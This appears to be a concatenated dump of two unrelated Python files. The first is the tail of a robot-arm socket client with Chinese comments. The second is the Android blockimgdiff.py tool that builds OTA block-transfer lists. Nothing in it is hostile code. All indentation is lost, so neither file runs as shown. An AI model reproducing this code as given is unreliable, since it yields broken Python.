data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
return(data)
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
blockimgdiff.py
|
# Copyright (C) 2014 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from collections import deque, OrderedDict
from hashlib import sha1
import array
import common
import functools
import heapq
import itertools
import multiprocessing
import os
import re
import subprocess
import threading
import time
import tempfile
from rangelib import RangeSet
__all__ = ["EmptyImage", "DataImage", "BlockImageDiff"]
def compute_patch(src, tgt, imgdiff=False):
srcfd, srcfile = tempfile.mkstemp(prefix="src-")
tgtfd, tgtfile = tempfile.mkstemp(prefix="tgt-")
patchfd, patchfile = tempfile.mkstemp(prefix="patch-")
os.close(patchfd)
try:
with os.fdopen(srcfd, "wb") as f_src:
for p in src:
f_src.write(p)
with os.fdopen(tgtfd, "wb") as f_tgt:
for p in tgt:
f_tgt.write(p)
try:
os.unlink(patchfile)
except OSError:
pass
if imgdiff:
p = subprocess.call(["imgdiff", "-z", srcfile, tgtfile, patchfile],
stdout=open("/dev/null", "a"),
stderr=subprocess.STDOUT)
else:
p = subprocess.call(["bsdiff", srcfile, tgtfile, patchfile])
if p:
raise ValueError("diff failed: " + str(p))
with open(patchfile, "rb") as f:
return f.read()
finally:
try:
os.unlink(srcfile)
os.unlink(tgtfile)
os.unlink(patchfile)
except OSError:
pass
class Image(object):
def ReadRangeSet(self, ranges):
raise NotImplementedError
def TotalSha1(self, include_clobbered_blocks=False):
raise NotImplementedError
class EmptyImage(Image):
"""A zero-length image."""
blocksize = 4096
care_map = RangeSet()
clobbered_blocks = RangeSet()
extended = RangeSet()
total_blocks = 0
file_map = {}
def ReadRangeSet(self, ranges):
return ()
def TotalSha1(self, include_clobbered_blocks=False):
# EmptyImage always carries empty clobbered_blocks, so
# include_clobbered_blocks can be ignored.
assert self.clobbered_blocks.size() == 0
return sha1().hexdigest()
class DataImage(Image):
"""An image wrapped around a single string of data."""
def __init__(self, data, trim=False, pad=False):
self.data = data
self.blocksize = 4096
assert not (trim and pad)
partial = len(self.data) % self.blocksize
padded = False
if partial > 0:
if trim:
self.data = self.data[:-partial]
elif pad:
self.data += '\0' * (self.blocksize - partial)
padded = True
else:
raise ValueError(("data for DataImage must be multiple of %d bytes "
"unless trim or pad is specified") %
(self.blocksize,))
assert len(self.data) % self.blocksize == 0
self.total_blocks = len(self.data) / self.blocksize
self.care_map = RangeSet(data=(0, self.total_blocks))
# When the last block is padded, we always write the whole block even for
# incremental OTAs. Because otherwise the last block may get skipped if
# unchanged for an incremental, but would fail the post-install
# verification if it has non-zero contents in the padding bytes.
# Bug: 23828506
if padded:
clobbered_blocks = [self.total_blocks-1, self.total_blocks]
else:
clobbered_blocks = []
self.clobbered_blocks = clobbered_blocks
self.extended = RangeSet()
zero_blocks = []
nonzero_blocks = []
reference = '\0' * self.blocksize
for i in range(self.total_blocks-1 if padded else self.total_blocks):
d = self.data[i*self.blocksize : (i+1)*self.blocksize]
if d == reference:
zero_blocks.append(i)
zero_blocks.append(i+1)
else:
nonzero_blocks.append(i)
nonzero_blocks.append(i+1)
assert zero_blocks or nonzero_blocks or clobbered_blocks
self.file_map = dict()
if zero_blocks:
self.file_map["__ZERO"] = RangeSet(data=zero_blocks)
if nonzero_blocks:
self.file_map["__NONZERO"] = RangeSet(data=nonzero_blocks)
if clobbered_blocks:
self.file_map["__COPY"] = RangeSet(data=clobbered_blocks)
def ReadRangeSet(self, ranges):
return [self.data[s*self.blocksize:e*self.blocksize] for (s, e) in ranges]
def TotalSha1(self, include_clobbered_blocks=False):
if not include_clobbered_blocks:
ranges = self.care_map.subtract(self.clobbered_blocks)
return sha1(self.ReadRangeSet(ranges)).hexdigest()
else:
return sha1(self.data).hexdigest()
class Transfer(object):
def __init__(self, tgt_name, src_name, tgt_ranges, src_ranges, style, by_id):
self.tgt_name = tgt_name
self.src_name = src_name
self.tgt_ranges = tgt_ranges
self.src_ranges = src_ranges
self.style = style
self.intact = (getattr(tgt_ranges, "monotonic", False) and
getattr(src_ranges, "monotonic", False))
# We use OrderedDict rather than dict so that the output is repeatable;
# otherwise it would depend on the hash values of the Transfer objects.
self.goes_before = OrderedDict()
self.goes_after = OrderedDict()
self.stash_before = []
self.use_stash = []
self.id = len(by_id)
by_id.append(self)
def NetStashChange(self):
return (sum(sr.size() for (_, sr) in self.stash_before) -
sum(sr.size() for (_, sr) in self.use_stash))
def ConvertToNew(self):
assert self.style != "new"
self.use_stash = []
self.style = "new"
self.src_ranges = RangeSet()
def __str__(self):
return (str(self.id) + ": <" + str(self.src_ranges) + " " + self.style +
" to " + str(self.tgt_ranges) + ">")
@functools.total_ordering
class HeapItem(object):
def __init__(self, item):
self.item = item
# Negate the score since python's heap is a min-heap and we want
# the maximum score.
self.score = -item.score
def clear(self):
self.item = None
def __bool__(self):
return self.item is None
def __eq__(self, other):
return self.score == other.score
def __le__(self, other):
return self.score <= other.score
# BlockImageDiff works on two image objects. An image object is
# anything that provides the following attributes:
#
# blocksize: the size in bytes of a block, currently must be 4096.
#
# total_blocks: the total size of the partition/image, in blocks.
#
# care_map: a RangeSet containing which blocks (in the range [0,
# total_blocks) we actually care about; i.e. which blocks contain
# data.
#
# file_map: a dict that partitions the blocks contained in care_map
# into smaller domains that are useful for doing diffs on.
# (Typically a domain is a file, and the key in file_map is the
# pathname.)
#
# clobbered_blocks: a RangeSet containing which blocks contain data
# but may be altered by the FS. They need to be excluded when
# verifying the partition integrity.
#
# ReadRangeSet(): a function that takes a RangeSet and returns the
# data contained in the image blocks of that RangeSet. The data
# is returned as a list or tuple of strings; concatenating the
# elements together should produce the requested data.
# Implementations are free to break up the data into list/tuple
# elements in any way that is convenient.
#
# TotalSha1(): a function that returns (as a hex string) the SHA-1
# hash of all the data in the image (ie, all the blocks in the
# care_map minus clobbered_blocks, or including the clobbered
# blocks if include_clobbered_blocks is True).
#
# When creating a BlockImageDiff, the src image may be None, in which
# case the list of transfers produced will never read from the
# original image.
class BlockImageDiff(object):
def __init__(self, tgt, src=None, threads=None, version=4,
disable_imgdiff=False):
if threads is None:
threads = multiprocessing.cpu_count() // 2
if threads == 0:
threads = 1
self.threads = threads
self.version = version
self.transfers = []
self.src_basenames = {}
self.src_numpatterns = {}
self._max_stashed_size = 0
self.touched_src_ranges = RangeSet()
self.touched_src_sha1 = None
self.disable_imgdiff = disable_imgdiff
assert version in (1, 2, 3, 4)
self.tgt = tgt
if src is None:
src = EmptyImage()
self.src = src
# The updater code that installs the patch always uses 4k blocks.
assert tgt.blocksize == 4096
assert src.blocksize == 4096
# The range sets in each filemap should comprise a partition of
# the care map.
self.AssertPartition(src.care_map, src.file_map.values())
self.AssertPartition(tgt.care_map, tgt.file_map.values())
@property
def max_stashed_size(self):
return self._max_stashed_size
def Compute(self, prefix):
# When looking for a source file to use as the diff input for a
# target file, we try:
# 1) an exact path match if available, otherwise
# 2) a exact basename match if available, otherwise
# 3) a basename match after all runs of digits are replaced by
# "#" if available, otherwise
# 4) we have no source for this target.
self.AbbreviateSourceNames()
self.FindTransfers()
# Find the ordering dependencies among transfers (this is O(n^2)
# in the number of transfers).
self.GenerateDigraph()
# Find a sequence of transfers that satisfies as many ordering
# dependencies as possible (heuristically).
self.FindVertexSequence()
# Fix up the ordering dependencies that the sequence didn't
# satisfy.
if self.version == 1:
self.RemoveBackwardEdges()
else:
self.ReverseBackwardEdges()
self.ImproveVertexSequence()
# Ensure the runtime stash size is under the limit.
if self.version >= 2 and common.OPTIONS.cache_size is not None:
self.ReviseStashSize()
# Double-check our work.
self.AssertSequenceGood()
self.ComputePatches(prefix)
self.WriteTransfers(prefix)
def HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def WriteTransfers(self, prefix):
def WriteSplitTransfers(out, style, target_blocks):
"""Limit the size of operand in command 'new' and 'zero' to 1024 blocks.
This prevents the target size of one command from being too large; and
might help to avoid fsync errors on some devices."""
assert (style == "new" or style == "zero")
blocks_limit = 1024
total = 0
while target_blocks:
blocks_to_write = target_blocks.first(blocks_limit)
out.append("%s %s\n" % (style, blocks_to_write.to_string_raw()))
total += blocks_to_write.size()
target_blocks = target_blocks.subtract(blocks_to_write)
return total
out = []
total = 0
stashes = {}
stashed_blocks = 0
max_stashed_blocks = 0
free_stash_ids = []
next_stash_id = 0
for xf in self.transfers:
if self.version < 2:
assert not xf.stash_before
assert not xf.use_stash
for s, sr in xf.stash_before:
assert s not in stashes
if free_stash_ids:
sid = heapq.heappop(free_stash_ids)
else:
sid = next_stash_id
next_stash_id += 1
stashes[s] = sid
if self.version == 2:
stashed_blocks += sr.size()
out.append("stash %d %s\n" % (sid, sr.to_string_raw()))
else:
sh = self.HashBlocks(self.src, sr)
if sh in stashes:
stashes[sh] += 1
else:
stashes[sh] = 1
stashed_blocks += sr.size()
self.touched_src_ranges = self.touched_src_ranges.union(sr)
out.append("stash %s %s\n" % (sh, sr.to_string_raw()))
if stashed_blocks > max_stashed_blocks:
max_stashed_blocks = stashed_blocks
free_string = []
free_size = 0
if self.version == 1:
src_str = xf.src_ranges.to_string_raw() if xf.src_ranges else ""
elif self.version >= 2:
# <# blocks> <src ranges>
# OR
# <# blocks> <src ranges> <src locs> <stash refs...>
# OR
# <# blocks> - <stash refs...>
size = xf.src_ranges.size()
src_str = [str(size)]
unstashed_src_ranges = xf.src_ranges
mapped_stashes = []
for s, sr in xf.use_stash:
sid = stashes.pop(s)
unstashed_src_ranges = unstashed_src_ranges.subtract(sr)
sh = self.HashBlocks(self.src, sr)
sr = xf.src_ranges.map_within(sr)
mapped_stashes.append(sr)
if self.version == 2:
src_str.append("%d:%s" % (sid, sr.to_string_raw()))
# A stash will be used only once. We need to free the stash
# immediately after the use, instead of waiting for the automatic
# clean-up at the end. Because otherwise it may take up extra space
# and lead to OTA failures.
# Bug: 23119955
free_string.append("free %d\n" % (sid,))
free_size += sr.size()
else:
assert sh in stashes
src_str.append("%s:%s" % (sh, sr.to_string_raw()))
stashes[sh] -= 1
if stashes[sh] == 0:
free_size += sr.size()
free_string.append("free %s\n" % (sh))
stashes.pop(sh)
heapq.heappush(free_stash_ids, sid)
if unstashed_src_ranges:
src_str.insert(1, unstashed_src_ranges.to_string_raw())
if xf.use_stash:
mapped_unstashed = xf.src_ranges.map_within(unstashed_src_ranges)
src_str.insert(2, mapped_unstashed.to_string_raw())
mapped_stashes.append(mapped_unstashed)
self.AssertPartition(RangeSet(data=(0, size)), mapped_stashes)
else:
src_str.insert(1, "-")
self.AssertPartition(RangeSet(data=(0, size)), mapped_stashes)
src_str = " ".join(src_str)
# all versions:
# zero <rangeset>
# new <rangeset>
# erase <rangeset>
#
# version 1:
# bsdiff patchstart patchlen <src rangeset> <tgt rangeset>
# imgdiff patchstart patchlen <src rangeset> <tgt rangeset>
# move <src rangeset> <tgt rangeset>
#
# version 2:
# bsdiff patchstart patchlen <tgt rangeset> <src_str>
# imgdiff patchstart patchlen <tgt rangeset> <src_str>
# move <tgt rangeset> <src_str>
#
# version 3:
# bsdiff patchstart patchlen srchash tgthash <tgt rangeset> <src_str>
# imgdiff patchstart patchlen srchash tgthash <tgt rangeset> <src_str>
# move hash <tgt rangeset> <src_str>
tgt_size = xf.tgt_ranges.size()
if xf.style == "new":
assert xf.tgt_ranges
assert tgt_size == WriteSplitTransfers(out, xf.style, xf.tgt_ranges)
total += tgt_size
elif xf.style == "move":
assert xf.tgt_ranges
assert xf.src_ranges.size() == tgt_size
if xf.src_ranges != xf.tgt_ranges:
if self.version == 1:
out.append("%s %s %s\n" % (
xf.style,
xf.src_ranges.to_string_raw(), xf.tgt_ranges.to_string_raw()))
elif self.version == 2:
out.append("%s %s %s\n" % (
xf.style,
xf.tgt_ranges.to_string_raw(), src_str))
elif self.version >= 3:
# take into account automatic stashing of overlapping blocks
if xf.src_ranges.overlaps(xf.tgt_ranges):
temp_stash_usage = stashed_blocks + xf.src_ranges.size()
if temp_stash_usage > max_stashed_blocks:
max_stashed_blocks = temp_stash_usage
self.touched_src_ranges = self.touched_src_ranges.union(
xf.src_ranges)
out.append("%s %s %s %s\n" % (
xf.style,
self.HashBlocks(self.tgt, xf.tgt_ranges),
xf.tgt_ranges.to_string_raw(), src_str))
total += tgt_size
elif xf.style in ("bsdiff", "imgdiff"):
assert xf.tgt_ranges
assert xf.src_ranges
if self.version == 1:
out.append("%s %d %d %s %s\n" % (
xf.style, xf.patch_start, xf.patch_len,
xf.src_ranges.to_string_raw(), xf.tgt_ranges.to_string_raw()))
elif self.version == 2:
out.append("%s %d %d %s %s\n" % (
xf.style, xf.patch_start, xf.patch_len,
xf.tgt_ranges.to_string_raw(), src_str))
elif self.version >= 3:
# take into account automatic stashing of overlapping blocks
if xf.src_ranges.overlaps(xf.tgt_ranges):
temp_stash_usage = stashed_blocks + xf.src_ranges.size()
if temp_stash_usage > max_stashed_blocks:
max_stashed_blocks = temp_stash_usage
self.touched_src_ranges = self.touched_src_ranges.union(
xf.src_ranges)
out.append("%s %d %d %s %s %s %s\n" % (
xf.style,
xf.patch_start, xf.patch_len,
self.HashBlocks(self.src, xf.src_ranges),
self.HashBlocks(self.tgt, xf.tgt_ranges),
xf.tgt_ranges.to_string_raw(), src_str))
total += tgt_size
elif xf.style == "zero":
assert xf.tgt_ranges
to_zero = xf.tgt_ranges.subtract(xf.src_ranges)
assert WriteSplitTransfers(out, xf.style, to_zero) == to_zero.size()
total += to_zero.size()
else:
raise ValueError("unknown transfer style '%s'\n" % xf.style)
if free_string:
out.append("".join(free_string))
stashed_blocks -= free_size
if self.version >= 2 and common.OPTIONS.cache_size is not None:
# Sanity check: abort if we're going to need more stash space than
# the allowed size (cache_size * threshold). There are two purposes
# of having a threshold here. a) Part of the cache may have been
# occupied by some recovery logs. b) It will buy us some time to deal
# with the oversize issue.
cache_size = common.OPTIONS.cache_size
stash_threshold = common.OPTIONS.stash_threshold
max_allowed = cache_size * stash_threshold
assert max_stashed_blocks * self.tgt.blocksize < max_allowed, \
'Stash size %d (%d * %d) exceeds the limit %d (%d * %.2f)' % (
max_stashed_blocks * self.tgt.blocksize, max_stashed_blocks,
self.tgt.blocksize, max_allowed, cache_size,
stash_threshold)
if self.version >= 3:
self.touched_src_sha1 = self.HashBlocks(
self.src, self.touched_src_ranges)
# Zero out extended blocks as a workaround for bug 20881595.
if self.tgt.extended:
assert (WriteSplitTransfers(out, "zero", self.tgt.extended) ==
self.tgt.extended.size())
total += self.tgt.extended.size()
# We erase all the blocks on the partition that a) don't contain useful
# data in the new image; b) will not be touched by dm-verity. Out of those
# blocks, we erase the ones that won't be used in this update at the
# beginning of an update. The rest would be erased at the end. This is to
# work around the eMMC issue observed on some devices, which may otherwise
# get starving for clean blocks and thus fail the update. (b/28347095)
all_tgt = RangeSet(data=(0, self.tgt.total_blocks))
all_tgt_minus_extended = all_tgt.subtract(self.tgt.extended)
new_dontcare = all_tgt_minus_extended.subtract(self.tgt.care_map)
erase_first = new_dontcare.subtract(self.touched_src_ranges)
if erase_first:
out.insert(0, "erase %s\n" % (erase_first.to_string_raw(),))
erase_last = new_dontcare.subtract(erase_first)
if erase_last:
out.append("erase %s\n" % (erase_last.to_string_raw(),))
out.insert(0, "%d\n" % (self.version,)) # format version number
out.insert(1, "%d\n" % (total,))
if self.version >= 2:
# version 2 only: after the total block count, we give the number
# of stash slots needed, and the maximum size needed (in blocks)
out.insert(2, str(next_stash_id) + "\n")
out.insert(3, str(max_stashed_blocks) + "\n")
with open(prefix + ".transfer.list", "wb") as f:
for i in out:
f.write(i)
if self.version >= 2:
self._max_stashed_size = max_stashed_blocks * self.tgt.blocksize
OPTIONS = common.OPTIONS
if OPTIONS.cache_size is not None:
max_allowed = OPTIONS.cache_size * OPTIONS.stash_threshold
print("max stashed blocks: %d (%d bytes), "
"limit: %d bytes (%.2f%%)\n" % (
max_stashed_blocks, self._max_stashed_size, max_allowed,
self._max_stashed_size * 100.0 / max_allowed))
else:
print("max stashed blocks: %d (%d bytes), limit: <unknown>\n" % (
max_stashed_blocks, self._max_stashed_size))
def ReviseStashSize(self):
print("Revising stash size...")
stashes = {}
# Create the map between a stash and its def/use points. For example, for a
# given stash of (idx, sr), stashes[idx] = (sr, def_cmd, use_cmd).
for xf in self.transfers:
# Command xf defines (stores) all the stashes in stash_before.
for idx, sr in xf.stash_before:
stashes[idx] = (sr, xf)
# Record all the stashes command xf uses.
for idx, _ in xf.use_stash:
stashes[idx] += (xf,)
# Compute the maximum blocks available for stash based on /cache size and
# the threshold.
cache_size = common.OPTIONS.cache_size
stash_threshold = common.OPTIONS.stash_threshold
max_allowed = cache_size * stash_threshold / self.tgt.blocksize
stashed_blocks = 0
new_blocks = 0
# Now go through all the commands. Compute the required stash size on the
# fly. If a command requires excess stash than available, it deletes the
# stash by replacing the command that uses the stash with a "new" command
# instead.
for xf in self.transfers:
replaced_cmds = []
# xf.stash_before generates explicit stash commands.
for idx, sr in xf.stash_before:
if stashed_blocks + sr.size() > max_allowed:
# We cannot stash this one for a later command. Find out the command
# that will use this stash and replace the command with "new".
use_cmd = stashes[idx][2]
replaced_cmds.append(use_cmd)
print("%10d %9s %s" % (sr.size(), "explicit", use_cmd))
else:
stashed_blocks += sr.size()
# xf.use_stash generates free commands.
for _, sr in xf.use_stash:
stashed_blocks -= sr.size()
# "move" and "diff" may introduce implicit stashes in BBOTA v3. Prior to
# ComputePatches(), they both have the style of "diff".
if xf.style == "diff" and self.version >= 3:
assert xf.tgt_ranges and xf.src_ranges
if xf.src_ranges.overlaps(xf.tgt_ranges):
if stashed_blocks + xf.src_ranges.size() > max_allowed:
replaced_cmds.append(xf)
print("%10d %9s %s" % (xf.src_ranges.size(), "implicit", xf))
# Replace the commands in replaced_cmds with "new"s.
for cmd in replaced_cmds:
# It no longer uses any commands in "use_stash". Remove the def points
# for all those stashes.
for idx, sr in cmd.use_stash:
def_cmd = stashes[idx][1]
assert (idx, sr) in def_cmd.stash_before
def_cmd.stash_before.remove((idx, sr))
# Add up blocks that violates space limit and print total number to
# screen later.
new_blocks += cmd.tgt_ranges.size()
cmd.ConvertToNew()
num_of_bytes = new_blocks * self.tgt.blocksize
print(" Total %d blocks (%d bytes) are packed as new blocks due to "
"insufficient cache size." % (new_blocks, num_of_bytes))
def ComputePatches(self, prefix):
print("Reticulating splines...")
diff_q = []
patch_num = 0
with open(prefix + ".new.dat", "wb") as new_f:
for xf in self.transfers:
if xf.style == "zero":
tgt_size = xf.tgt_ranges.size() * self.tgt.blocksize
print("%10d %10d (%6.2f%%) %7s %s %s" % (
tgt_size, tgt_size, 100.0, xf.style, xf.tgt_name,
str(xf.tgt_ranges)))
elif xf.style == "new":
for piece in self.tgt.ReadRangeSet(xf.tgt_ranges):
new_f.write(piece)
tgt_size = xf.tgt_ranges.size() * self.tgt.blocksize
print("%10d %10d (%6.2f%%) %7s %s %s" % (
tgt_size, tgt_size, 100.0, xf.style,
xf.tgt_name, str(xf.tgt_ranges)))
elif xf.style == "diff":
src = self.src.ReadRangeSet(xf.src_ranges)
tgt = self.tgt.ReadRangeSet(xf.tgt_ranges)
# We can't compare src and tgt directly because they may have
# the same content but be broken up into blocks differently, eg:
#
# ["he", "llo"] vs ["h", "ello"]
#
# We want those to compare equal, ideally without having to
# actually concatenate the strings (these may be tens of
# megabytes).
src_sha1 = sha1()
for p in src:
src_sha1.update(p)
tgt_sha1 = sha1()
tgt_size = 0
for p in tgt:
tgt_sha1.update(p)
tgt_size += len(p)
if src_sha1.digest() == tgt_sha1.digest():
# These are identical; we don't need to generate a patch,
# just issue copy commands on the device.
xf.style = "move"
if xf.src_ranges != xf.tgt_ranges:
print("%10d %10d (%6.2f%%) %7s %s %s (from %s)" % (
tgt_size, tgt_size, 100.0, xf.style,
xf.tgt_name if xf.tgt_name == xf.src_name else (
xf.tgt_name + " (from " + xf.src_name + ")"),
str(xf.tgt_ranges), str(xf.src_ranges)))
else:
# For files in zip format (eg, APKs, JARs, etc.) we would
# like to use imgdiff -z if possible (because it usually
# produces significantly smaller patches than bsdiff).
# This is permissible if:
#
# - imgdiff is not disabled, and
# - the source and target files are monotonic (ie, the
# data is stored with blocks in increasing order), and
# - we haven't removed any blocks from the source set.
#
# If these conditions are satisfied then appending all the
# blocks in the set together in order will produce a valid
# zip file (plus possibly extra zeros in the last block),
# which is what imgdiff needs to operate. (imgdiff is
# fine with extra zeros at the end of the file.)
imgdiff = (not self.disable_imgdiff and xf.intact and
xf.tgt_name.split(".")[-1].lower()
in ("apk", "jar", "zip"))
xf.style = "imgdiff" if imgdiff else "bsdiff"
diff_q.append((tgt_size, src, tgt, xf, patch_num))
patch_num += 1
else:
assert False, "unknown style " + xf.style
if diff_q:
if self.threads > 1:
print("Computing patches (using %d threads)..." % (self.threads,))
else:
print("Computing patches...")
diff_q.sort()
patches = [None] * patch_num
# TODO: Rewrite with multiprocessing.ThreadPool?
lock = threading.Lock()
def diff_worker():
while True:
with lock:
if not diff_q:
return
tgt_size, src, tgt, xf, patchnum = diff_q.pop()
patch = compute_patch(src, tgt, imgdiff=(xf.style == "imgdiff"))
size = len(patch)
with lock:
patches[patchnum] = (patch, xf)
print("%10d %10d (%6.2f%%) %7s %s %s %s" % (
size, tgt_size, size * 100.0 / tgt_size, xf.style,
xf.tgt_name if xf.tgt_name == xf.src_name else (
xf.tgt_name + " (from " + xf.src_name + ")"),
str(xf.tgt_ranges), str(xf.src_ranges)))
threads = [threading.Thread(target=diff_worker)
for _ in range(self.threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
else:
patches = []
p = 0
with open(prefix + ".patch.dat", "wb") as patch_f:
for patch, xf in patches:
xf.patch_start = p
xf.patch_len = len(patch)
patch_f.write(patch)
p += len(patch)
def AssertSequenceGood(self):
# Simulate the sequences of transfers we will output, and check that:
# - we never read a block after writing it, and
# - we write every block we care about exactly once.
# Start with no blocks having been touched yet.
touched = array.array("B", "\0" * self.tgt.total_blocks)
# Imagine processing the transfers in order.
for xf in self.transfers:
# Check that the input blocks for this transfer haven't yet been touched.
x = xf.src_ranges
if self.version >= 2:
for _, sr in xf.use_stash:
x = x.subtract(sr)
for s, e in x:
# Source image could be larger. Don't check the blocks that are in the
# source image only. Since they are not in 'touched', and won't ever
# be touched.
for i in range(s, min(e, self.tgt.total_blocks)):
assert touched[i] == 0
# Check that the output blocks for this transfer haven't yet
# been touched, and touch all the blocks written by this
# transfer.
for s, e in xf.tgt_ranges:
for i in range(s, e):
assert touched[i] == 0
touched[i] = 1
# Check that we've written every target block.
for s, e in self.tgt.care_map:
for i in range(s, e):
assert touched[i] == 1
def ImproveVertexSequence(self):
print("Improving vertex order...")
# At this point our digraph is acyclic; we reversed any edges that
# were backwards in the heuristically-generated sequence. The
# previously-generated order is still acceptable, but we hope to
# find a better order that needs less memory for stashed data.
# Now we do a topological sort to generate a new vertex order,
# using a greedy algorithm to choose which vertex goes next
# whenever we have a choice.
# Make a copy of the edge set; this copy will get destroyed by the
# algorithm.
for xf in self.transfers:
xf.incoming = xf.goes_after.copy()
xf.outgoing = xf.goes_before.copy()
L = [] # the new vertex order
# S is the set of sources in the remaining graph; we always choose
# the one that leaves the least amount of stashed data after it's
# executed.
S = [(u.NetStashChange(), u.order, u) for u in self.transfers
if not u.incoming]
heapq.heapify(S)
while S:
_, _, xf = heapq.heappop(S)
L.append(xf)
for u in xf.outgoing:
del u.incoming[xf]
if not u.incoming:
heapq.heappush(S, (u.NetStashChange(), u.order, u))
# if this fails then our graph had a cycle.
assert len(L) == len(self.transfers)
self.transfers = L
for i, xf in enumerate(L):
xf.order = i
def RemoveBackwardEdges(self):
print("Removing backward edges...")
in_order = 0
out_of_order = 0
lost_source = 0
for xf in self.transfers:
lost = 0
size = xf.src_ranges.size()
for u in xf.goes_before:
# xf should go before u
if xf.order < u.order:
# it does, hurray!
in_order += 1
else:
# it doesn't, boo. trim the blocks that u writes from xf's
# source, so that xf can go after u.
out_of_order += 1
assert xf.src_ranges.overlaps(u.tgt_ranges)
xf.src_ranges = xf.src_ranges.subtract(u.tgt_ranges)
xf.intact = False
if xf.style == "diff" and not xf.src_ranges:
# nothing left to diff from; treat as new data
xf.style = "new"
lost = size - xf.src_ranges.size()
lost_source += lost
print((" %d/%d dependencies (%.2f%%) were violated; "
"%d source blocks removed.") %
(out_of_order, in_order + out_of_order,
(out_of_order * 100.0 / (in_order + out_of_order))
if (in_order + out_of_order) else 0.0,
lost_source))
def ReverseBackwardEdges(self):
print("Reversing backward edges...")
in_order = 0
out_of_order = 0
stashes = 0
stash_size = 0
for xf in self.transfers:
for u in xf.goes_before.copy():
# xf should go before u
if xf.order < u.order:
# it does, hurray!
in_order += 1
else:
# it doesn't, boo. modify u to stash the blocks that it
# writes that xf wants to read, and then require u to go
# before xf.
out_of_order += 1
overlap = xf.src_ranges.intersect(u.tgt_ranges)
assert overlap
u.stash_before.append((stashes, overlap))
xf.use_stash.append((stashes, overlap))
stashes += 1
stash_size += overlap.size()
# reverse the edge direction; now xf must go after u
del xf.goes_before[u]
del u.goes_after[xf]
xf.goes_after[u] = None # value doesn't matter
u.goes_before[xf] = None
print((" %d/%d dependencies (%.2f%%) were violated; "
"%d source blocks stashed.") %
(out_of_order, in_order + out_of_order,
(out_of_order * 100.0 / (in_order + out_of_order))
if (in_order + out_of_order) else 0.0,
stash_size))
def FindVertexSequence(self):
print("Finding vertex sequence...")
# This is based on "A Fast & Effective Heuristic for the Feedback
# Arc Set Problem" by P. Eades, X. Lin, and W.F. Smyth. Think of
# it as starting with the digraph G and moving all the vertices to
# be on a horizontal line in some order, trying to minimize the
# number of edges that end up pointing to the left. Left-pointing
# edges will get removed to turn the digraph into a DAG. In this
# case each edge has a weight which is the number of source blocks
# we'll lose if that edge is removed; we try to minimize the total
# weight rather than just the number of edges.
# Make a copy of the edge set; this copy will get destroyed by the
# algorithm.
for xf in self.transfers:
xf.incoming = xf.goes_after.copy()
xf.outgoing = xf.goes_before.copy()
xf.score = sum(xf.outgoing.values()) - sum(xf.incoming.values())
# We use an OrderedDict instead of just a set so that the output
# is repeatable; otherwise it would depend on the hash values of
# the transfer objects.
G = OrderedDict()
for xf in self.transfers:
G[xf] = None
s1 = deque() # the left side of the sequence, built from left to right
s2 = deque() # the right side of the sequence, built from right to left
heap = []
for xf in self.transfers:
xf.heap_item = HeapItem(xf)
heap.append(xf.heap_item)
heapq.heapify(heap)
# Use OrderedDict() instead of set() to preserve the insertion order. Need
# to use 'sinks[key] = None' to add key into the set. sinks will look like
# { key1: None, key2: None, ... }.
sinks = OrderedDict.fromkeys(u for u in G if not u.outgoing)
sources = OrderedDict.fromkeys(u for u in G if not u.incoming)
def adjust_score(iu, delta):
iu.score += delta
iu.heap_item.clear()
iu.heap_item = HeapItem(iu)
heapq.heappush(heap, iu.heap_item)
while G:
# Put all sinks at the end of the sequence.
while sinks:
new_sinks = OrderedDict()
for u in sinks:
if u not in G: continue
s2.appendleft(u)
del G[u]
for iu in u.incoming:
adjust_score(iu, -iu.outgoing.pop(u))
if not iu.outgoing:
new_sinks[iu] = None
sinks = new_sinks
# Put all the sources at the beginning of the sequence.
while sources:
new_sources = OrderedDict()
for u in sources:
if u not in G: continue
s1.append(u)
del G[u]
for iu in u.outgoing:
adjust_score(iu, +iu.incoming.pop(u))
if not iu.incoming:
new_sources[iu] = None
sources = new_sources
if not G: break
# Find the "best" vertex to put next. "Best" is the one that
# maximizes the net difference in source blocks saved we get by
# pretending it's a source rather than a sink.
while True:
u = heapq.heappop(heap)
if u and u.item in G:
u = u.item
break
s1.append(u)
del G[u]
for iu in u.outgoing:
adjust_score(iu, +iu.incoming.pop(u))
if not iu.incoming:
sources[iu] = None
for iu in u.incoming:
adjust_score(iu, -iu.outgoing.pop(u))
if not iu.outgoing:
sinks[iu] = None
# Now record the sequence in the 'order' field of each transfer,
# and by rearranging self.transfers to be in the chosen sequence.
new_transfers = []
for x in itertools.chain(s1, s2):
x.order = len(new_transfers)
new_transfers.append(x)
